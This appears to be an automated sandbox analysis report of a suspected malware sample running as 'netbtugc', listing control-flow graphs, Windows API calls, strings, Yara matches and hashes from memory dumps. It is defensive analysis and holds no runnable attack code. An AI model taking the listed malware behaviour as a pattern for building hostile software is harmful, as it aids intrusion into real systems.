                                                                                                  control_flow_graph 437 2c60d60-2c60d78 438 2c60d9d-2c60d9f 437->438 439 2c60d7b-2c60d7d 437->439 440 2c60da1-2c60dad 438->440 441 2c60dbc-2c60dc5 438->441 439->438 442 2c60dc7-2c60dcf 441->442 443 2c60e2f 441->443 444 2c60dd1-2c60df0 442->444 445 2c60d5a-2c60d5d 442->445 446 2c60e31 443->446 447 2c60db2-2c60db6 444->447 448 2c60df2-2c60dfd 444->448 449 2c60d17-2c60d2c call 2c60920 445->449 450 2c60e33-2c60e5f 446->450 447->446 455 2c60db8-2c60db9 447->455 451 2c60e02-2c60e0d 448->451 465 2c60cb0-2c60cea call 2c7b420 call 2c7ba30 call 2c71bb0 449->465 466 2c60d2e-2c60d43 call 2c609b0 449->466 452 2c60e81-2c60ec9 450->452 453 2c60e61-2c60e7b 450->453 457 2c60e12 451->457 458 2c60e0f-2c60e11 451->458 462 2c60f40-2c60f77 call 2c645d0 call 2c51410 call 2c71c10 452->462 463 2c60ecb-2c60ed9 452->463 453->451 464 2c60e7e-2c60e80 453->464 455->450 456 2c60dbb 455->456 456->441 457->443 458->457 483 2c60f97-2c60f9d 462->483 484 2c60f79-2c60f88 PostThreadMessageW 462->484 464->452 465->449 482 2c60cec-2c60cf2 465->482 485 2c60d44-2c60d47 482->485 486 2c60cf4-2c60d15 call 2c751d0 482->486 484->483 487 2c60f8a-2c60f94 484->487 485->449 488 2c60d49-2c60d55 call 2c76c90 485->488 486->449 486->466 487->483 488->445
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 3Z43$aU04$aU043Z43$aU043Z43
                                                                                                  • API String ID: 0-2425402595
                                                                                                  • Opcode ID: cfa0436301e0a7083a9e8c09fdcd12c5cad99fb7f5c7f5801a9feeae4d69e037
                                                                                                  • Instruction ID: 9422222573e41aa1ac4bb75c4a45026d4c20381581d6e49186812eebd3e75eff
                                                                                                  • Opcode Fuzzy Hash: cfa0436301e0a7083a9e8c09fdcd12c5cad99fb7f5c7f5801a9feeae4d69e037
                                                                                                  • Instruction Fuzzy Hash: 2651F073904354BFD712C6A59C89BFEB778FFC1664F14025EE884AB013E7218A128BD1
                                                                                                  Function 02C60F09 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 65threadwindowCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(34305561,00000111,?,?), ref: 02C60F84
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessagePostThread
                                                                                                  • String ID: 3Z43$aU04$aU043Z43$aU043Z43
                                                                                                  • API String ID: 1836367815-2425402595
                                                                                                  • Opcode ID: 15e2a16d19126d703cfd28b1128576458fec5e1c2a6cc2a97d31bcb2dec732f0
                                                                                                  • Instruction ID: 357b71298f0b20cbe8f6c149415801855b7e2a06192af9e7e4f790a71bb62277
                                                                                                  • Opcode Fuzzy Hash: 15e2a16d19126d703cfd28b1128576458fec5e1c2a6cc2a97d31bcb2dec732f0
                                                                                                  • Instruction Fuzzy Hash: 9401A1B2D0125CBEEB119AE08C81DFF7B7DDF417A8F048164FA04A7100D6799E069FA1
                                                                                                  Function 02C60F10 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 60threadwindowCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 536 2c60f10-2c60f22 537 2c60f2a-2c60f77 call 2c7be80 call 2c645d0 call 2c51410 call 2c71c10 536->537 538 2c60f25 call 2c7b470 536->538 548 2c60f97-2c60f9d 537->548 549 2c60f79-2c60f88 PostThreadMessageW 537->549 538->537 549->548 550 2c60f8a-2c60f94 549->550 550->548
                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(34305561,00000111,?,?), ref: 02C60F84
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessagePostThread
                                                                                                  • String ID: 3Z43$aU04$aU043Z43$aU043Z43
                                                                                                  • API String ID: 1836367815-2425402595
                                                                                                  • Opcode ID: c3503257fa3e5f4b8588002bb8c79f3d1b97a87670046d2012e7746a91583977
                                                                                                  • Instruction ID: 232bd17ec17a7398bce6ca6a5c453c7c7558eb22da3b9e2b7a07c1041f15b9cb
                                                                                                  • Opcode Fuzzy Hash: c3503257fa3e5f4b8588002bb8c79f3d1b97a87670046d2012e7746a91583977
                                                                                                  • Instruction Fuzzy Hash: CF0184B1D4125C7EEB11AAE08C81DFF7B7CDF41798F048065FA04A7140D6649E069BA1
                                                                                                  Function 02C73A70 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 107sleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • Sleep.KERNELBASE(000007D0), ref: 02C73B3D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Sleep
                                                                                                  • String ID: net.dll$wininet.dll
                                                                                                  • API String ID: 3472027048-1269752229
                                                                                                  • Opcode ID: ec36af4000c913946de1dbdc4c870bab6709e4101200cc46c12b32ec5d247d8c
                                                                                                  • Instruction ID: 6f43133df0aeeb5c88506c149120f35052c61acf4c3923ae892ffa7c4d11bbc4
                                                                                                  • Opcode Fuzzy Hash: ec36af4000c913946de1dbdc4c870bab6709e4101200cc46c12b32ec5d247d8c
                                                                                                  • Instruction Fuzzy Hash: CC31A1B1A00605BBD715DFA4C884FEBBBBDFB88714F44415CE919AB240D774AA40DFA4
                                                                                                  Function 02C6F4F0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InitializeUninitialize
                                                                                                  • String ID: @J7<
                                                                                                  • API String ID: 3442037557-2016760708
                                                                                                  • Opcode ID: f50b9c534f907f91059f6f39aae50d0cb76661672409bab82210863753d0fbc2
                                                                                                  • Instruction ID: 9171f3fbe4be52f8dccc2bbb78cddb1f9b18eaba9b0aaddb37be21899b5f94f7
                                                                                                  • Opcode Fuzzy Hash: f50b9c534f907f91059f6f39aae50d0cb76661672409bab82210863753d0fbc2
                                                                                                  • Instruction Fuzzy Hash: DE31FEB5A0060AAFDB10DFD8D8809EFB7B9FF88304B108559E516EB214D775EE45CBA0
                                                                                                  Function 02C6F4EE Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 100COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InitializeUninitialize
                                                                                                  • String ID: @J7<
                                                                                                  • API String ID: 3442037557-2016760708
                                                                                                  • Opcode ID: eb9e82a47cc85246791612b3784da8400d201025153b8c1328bacc2a845cd446
                                                                                                  • Instruction ID: f4b9514b28e556bcca2b974a909a191c4ae7d75379132ebac07d2e9d43947447
                                                                                                  • Opcode Fuzzy Hash: eb9e82a47cc85246791612b3784da8400d201025153b8c1328bacc2a845cd446
                                                                                                  • Instruction Fuzzy Hash: A33102B5A0060A9FDB10DFD8D8809EFB7B9FF88304B108559E516EB214D775EE45CBA0
                                                                                                  Function 02C645D0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02C64642
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Load
                                                                                                  • String ID:
                                                                                                  • API String ID: 2234796835-0
                                                                                                  • Opcode ID: e4d18d39c10e45269c54ae3f733766b5f2b84eb243d2e6b2cec40681c89af818
                                                                                                  • Instruction ID: 5261e993e949d9e40ca6d607a7e763eaf9d7fdd6306578ee0fe079553068bbc2
                                                                                                  • Opcode Fuzzy Hash: e4d18d39c10e45269c54ae3f733766b5f2b84eb243d2e6b2cec40681c89af818
                                                                                                  • Instruction Fuzzy Hash: 77015EB5D0020DABDF20EBA4DC81FAEB7799B44308F0081A5A90897240F631EB04DF91
                                                                                                  Function 02C79740 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateProcessInternalW.KERNELBASE(?,?,?,?,02C68364,00000010,?,?,?,00000044,?,00000010,02C68364,?,?,?), ref: 02C797A3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateInternalProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 2186235152-0
                                                                                                  • Opcode ID: 997d1016b9a4c23389658716c36cc45b1e44da038576d18f6146ae332f0ef356
                                                                                                  • Instruction ID: 7d7b612983ecdd995d5b1ae3e3e3fa5f932ed7c7aa4669bc6fdb1d61301c0ffa
                                                                                                  • Opcode Fuzzy Hash: 997d1016b9a4c23389658716c36cc45b1e44da038576d18f6146ae332f0ef356
                                                                                                  • Instruction Fuzzy Hash: 9F0180B2205509BBDB58DE99DC81EEB77AEAF8C754F518118FA0DE3240D630F8518BA4
                                                                                                  Function 02C59E80 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02C59EC2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2422867632-0
                                                                                                  • Opcode ID: e6d5c08324f7a6e73027688f6daec177e6c6943f314cbe49aaa29304804d5a20
                                                                                                  • Instruction ID: e29938ae64527158b5c3141830ad6c3dae39b52c43d6e3c1f28478c696bfdfff
                                                                                                  • Opcode Fuzzy Hash: e6d5c08324f7a6e73027688f6daec177e6c6943f314cbe49aaa29304804d5a20
                                                                                                  • Instruction Fuzzy Hash: BFF0657338061476E72061A99C02FE7764C9BC0771F180425FA0CEB1C0D991F55156E9
                                                                                                  Function 02C59E7C Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02C59EC2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2422867632-0
                                                                                                  • Opcode ID: d19d3dbc64c884f0bd8ef04bd11dcd8e79e3b97a59fe9c503a956e2f9fe004d2
                                                                                                  • Instruction ID: 5a87e4f996e4217354b0bb3922ef6becadc19157e6601dd677ebf474a184222f
                                                                                                  • Opcode Fuzzy Hash: d19d3dbc64c884f0bd8ef04bd11dcd8e79e3b97a59fe9c503a956e2f9fe004d2
                                                                                                  • Instruction Fuzzy Hash: 92E092722C061076E33062A89C02FE76B5D8BD0761F180529F648EB2C0DAE1F98196E8
                                                                                                  Function 02C78290 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 02C782D0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$NameName_
                                                                                                  • String ID:
                                                                                                  • API String ID: 3514427675-0
                                                                                                  • Opcode ID: 54f06e5d341783fac918440ec3b4f1fdd0575bae25064db6df5a96cbde286313
                                                                                                  • Instruction ID: 28a59808767b06a20c00477863fc6ce4f946a70721e0675ac76da2767445f9f4
                                                                                                  • Opcode Fuzzy Hash: 54f06e5d341783fac918440ec3b4f1fdd0575bae25064db6df5a96cbde286313
                                                                                                  • Instruction Fuzzy Hash: 46F015B52006047BC610EE59DC40FAB77AEEFC8720F004118F908A7241D770B8118BB8
                                                                                                  Function 02C796B0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,89C3D2E1,00000007,00000000,00000004,00000000,02C63EBC,000000F4), ref: 02C796EC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FreeHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 3298025750-0
                                                                                                  • Opcode ID: bfb6145444b6225af2390b6e4a4cbb167667cfc20b6587a7338d8edbf369b45c
                                                                                                  • Instruction ID: 3da41a7bd9f4bfbd295547e585392ebf78bb861bfb398e1f8e3b674c2624a68f
                                                                                                  • Opcode Fuzzy Hash: bfb6145444b6225af2390b6e4a4cbb167667cfc20b6587a7338d8edbf369b45c
                                                                                                  • Instruction Fuzzy Hash: 2EE06572200218BBD624EE99DC40FAB73EEEF88710F004408FA08A7241D770B9118BB8
                                                                                                  Function 02C79660 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(02C61B99,?,02C75DE2,02C61B99,02C7563E,02C75DE2,?,02C61B99,02C7563E,00001000,?,?,00000000), ref: 02C7969F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: 53460c4f2eaba0125bc6c5a4ca4ac02d6cdb0e6bef2478e89afa955253187785
                                                                                                  • Instruction ID: e360db1c65831777cc318cef3a85ae3d010b9d52f74cb7337163d455610e1eb8
                                                                                                  • Opcode Fuzzy Hash: 53460c4f2eaba0125bc6c5a4ca4ac02d6cdb0e6bef2478e89afa955253187785
                                                                                                  • Instruction Fuzzy Hash: B4E0E5722002147BD618EF59DC49FAB77EDEFC9714F008419FA08A7281D771B9108BB8
                                                                                                  Function 02C683A0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02C683CA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 3188754299-0
                                                                                                  • Opcode ID: b7f4515b44587824d471ea8cf5126788125867bbd258670f71e8b84c6ca8c082
                                                                                                  • Instruction ID: bfb78fd3b79e1515440f9ecaaf9c9f841808614f5d877b1e3df658a63bf30362
                                                                                                  • Opcode Fuzzy Hash: b7f4515b44587824d471ea8cf5126788125867bbd258670f71e8b84c6ca8c082
                                                                                                  • Instruction Fuzzy Hash: DFE086792502082BFB1466A89C89F77339C5B88668F1C4770B91CDB3C2D6B4F6539154
                                                                                                  Function 02C681A0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,02C61E80,02C77F7F,02C7563E,02C61E50), ref: 02C681D1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorMode
                                                                                                  • String ID:
                                                                                                  • API String ID: 2340568224-0
                                                                                                  • Opcode ID: 2ace18c4ddb876d14aa25614752ab631b56645002548c41b964f28f70ac7a5ec
                                                                                                  • Instruction ID: 5336975d21070fc29676127d1fa1b1e458fc55a8a72e97b798ba62ca7124335e
                                                                                                  • Opcode Fuzzy Hash: 2ace18c4ddb876d14aa25614752ab631b56645002548c41b964f28f70ac7a5ec
                                                                                                  • Instruction Fuzzy Hash: FFD05EB67C03053BFA00A6E4DC0AF26328DAB447A4F094464BD0CDB2C2E992F11065A9
                                                                                                  Function 034B2B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: ab18331888798f038d1b5592a81001dfb70eadd845662eea3c32c547970f0b3a
                                                                                                  • Instruction ID: fb52313aa94ad16a8435faad3da1124cd6fd0627dc474a6427025b0464f104f2
                                                                                                  • Opcode Fuzzy Hash: ab18331888798f038d1b5592a81001dfb70eadd845662eea3c32c547970f0b3a
                                                                                                  • Instruction Fuzzy Hash: D2B09B719054C5C5EA51DB604708717791477D0701F15C457D1470A91E8778C091F179

                                                                                                  Non-executed Functions

                                                                                                  Function 037904E8 Relevance: .1, Instructions: 146COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33210164165.0000000003790000.00000040.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3790000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fe6b5bbbef3265565f9900527e02972517c4168846f5cc69a9196fc33fa887a2
                                                                                                  • Instruction ID: 04a46e792f2f0b22a38d3f5ada4a38f345c1a0ea82e0693359a4eec1d82985bd
                                                                                                  • Opcode Fuzzy Hash: fe6b5bbbef3265565f9900527e02972517c4168846f5cc69a9196fc33fa887a2
                                                                                                  • Instruction Fuzzy Hash: 1141E475518F0D4FE768EF6CA085676B3E2FB89300F50062EC98AC7652EB70D8468785
                                                                                                  Function 0379DEF9 Relevance: 57.7, Strings: 46, Instructions: 249COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33210164165.0000000003790000.00000040.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3790000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                  • API String ID: 0-3754132690
                                                                                                  • Opcode ID: 0de7e9234ace8c46621ffae33cbaf91df6bb313ef201abec77e5d4ca6a32715c
                                                                                                  • Instruction ID: 4eef0bfb50b295264e097191156674a85c7040f149465d22f4e830b09384b19c
                                                                                                  • Opcode Fuzzy Hash: 0de7e9234ace8c46621ffae33cbaf91df6bb313ef201abec77e5d4ca6a32715c
                                                                                                  • Instruction Fuzzy Hash: 7FA161F04482948EC7158F58A0652AFFFB5EBC6305F1581ADE6E6BB243C37E89058B85
                                                                                                  Function 034A7550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 034E4530
                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 034E454D
                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 034E4460
                                                                                                  • Execute=1, xrefs: 034E451E
                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 034E4592
                                                                                                  • ExecuteOptions, xrefs: 034E44AB
                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 034E4507
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                  • API String ID: 0-484625025
                                                                                                  • Opcode ID: 10c7200d82d0e1693c3d6e59cf6c7671da0d104f288d632996345a0a8413cb1f
                                                                                                  • Instruction ID: 27f0df423b9bc8b8134c062d4c666258d8cfbebc894af687556e8fcb7a22c7f8
                                                                                                  • Opcode Fuzzy Hash: 10c7200d82d0e1693c3d6e59cf6c7671da0d104f288d632996345a0a8413cb1f
                                                                                                  • Instruction Fuzzy Hash: D3512B31A007197EDF60EAD9DC45FEE77A8AF14310F0804ABE6159F291DB709A458B6C
                                                                                                  Function 03479046 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $$@
                                                                                                  • API String ID: 0-1194432280
                                                                                                  • Opcode ID: ca1087f36bb3072945b7561b2678b61047bf9a4570b1ab532f444a966eccf87a
                                                                                                  • Instruction ID: 650ecc33c1fd766d7c6b376f0909246f142830185555c1397387dd59cf99ebdd
                                                                                                  • Opcode Fuzzy Hash: ca1087f36bb3072945b7561b2678b61047bf9a4570b1ab532f444a966eccf87a
                                                                                                  • Instruction Fuzzy Hash: 92814971D002699BDB31DF54CC44BEEB6B8AB08710F0445EBE919BB250E7709E85CFA4